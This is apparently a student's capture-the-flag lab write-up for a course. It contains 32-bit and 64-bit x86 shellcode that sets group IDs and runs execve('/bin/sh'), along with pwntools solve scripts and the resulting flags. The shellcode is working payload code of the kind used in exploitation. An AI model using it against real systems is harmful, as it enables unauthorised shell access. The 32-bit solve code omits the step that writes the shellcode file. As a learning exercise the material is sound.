# Write-up for Unit2-1

- netID: TXK220008
- Name: Takemaru Kadoi

All the write-ups are supposed to use this import.

In [ ]:
from pwn import asm, process, context

: 

## 1-shellcode-32

The problem statement is below.

```md
Write a 32-bit shellcode that runs:
    setregid(getegid(), getegid())
    execve("/bin/sh", 0, 0);
and put the shellcode binary (shellcode.bin) into this directory.
```

The solution seems straightforward. Write assembly to execute the command above.

[This site](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit) looks good to refer to system calls.

This is the assembly code to execute the required shellcode.

In [ ]:
# setregid(getegid(), getegid())
# getegid: 0x32(%eax)
# setregid: 0x47(%eax) (%ebx = gid_t rgid, %ecx = gid_t rgid)
shellcode = asm(
    """
mov     eax, 0x32
int     0x80
mov     ebx, eax
mov     ecx, eax
mov     eax, 0x47
int     0x80
"""
)
# execve("/bin/sh", 0, 0)
# execve: 0x0b(%eax) (%ebx = const char *filename, %ecx = const char *const *argv, %edx = const char *const *envp)
# /bin/sh = 2f62696e2f7368
shellcode += asm(
    """
mov     eax, 0x0b
push    edx
push    0x68732f6e
push    0x69622f2f
mov     ebx, esp
mov     ecx, 0
mov     edx, 0
int     0x80
"""
)

: 

This is the code to run the assembly.

In [ ]:
io = process(['./1-shellcode-32'])
io.interactive()

: 

After running the program, you get the following flag.

```bash
TXK220008@ctf-vm1:~/unit2/1-shellcode-32$ ./solve.py
[+] Starting local process './1-shellcode-32': pid 17060
[*] Switching to interactive mode
Reading shellcode from shellcode.bin
$ cat flag
CS6332{execve_bin_sh}
```

## 2-shellcode-64

The problem statement is below.

```md
Write a 64-bit shellcode that runs:
    setregid(getegid(), getegid())
    execve("/bin/sh", 0, 0);
and put the shellcode binary (shellcode.bin) into this directory.
```

The only difference from `1-shellcode-32` is that this problem uses 64-bit program. Bear it in mind and solve it.

To make the assembly for 64-bit program, use `context.clear(arch="amd64")`.

The program is basically the same, but to use 8 bytes for a string, I am using stack here.

```x86asm
mov     rbx, 0x68732f6e69622f2f
push    0
push    rbx
mov     rdi, rsp
```

In [ ]:
context.clear(arch="amd64")

# setregid(getegid(), getegid())
# getegid: 0x6c(%rax)
# setregid: 0x72(%rax) (%rdi = gid_t rgid, %rsi = gid_t rgid)
shellcode = asm(
    """
mov     rax, 0x6c
syscall
mov     rdi, rax
mov     rsi, rax
mov     rax, 0x72
syscall
"""
)
# execve("/bin/sh", 0, 0)
# execve: 0x3b(%rax) (%rdi = const char *filename, %rsi = const char *const *argv, %rdx = const char *const *envp)
# /bin/sh = 2f62696e2f7368
shellcode += asm(
    """
mov     rax, 0x3b
mov     rbx, 0x68732f6e69622f2f
push    0
push    rbx
mov     rdi, rsp
mov     rsi, 0
mov     rdx, 0
syscall
"""
)
with open("shellcode.bin", "wb") as shellcode_file:
    shellcode_file.write(shellcode)
io = process(["./2-shellcode-64"])
io.interactive()

: 

After running the program, you get the following flag.

```bash
TXK220008@ctf-vm1:~/unit2/2-shellcode-64$ ./solve2.py
[+] Starting local process './2-shellcode-64': pid 9898
[*] Switching to interactive mode
Reading shellcode from shellcode.bin
$ cat flag
CS6332{exEcvE_b1n_5h
```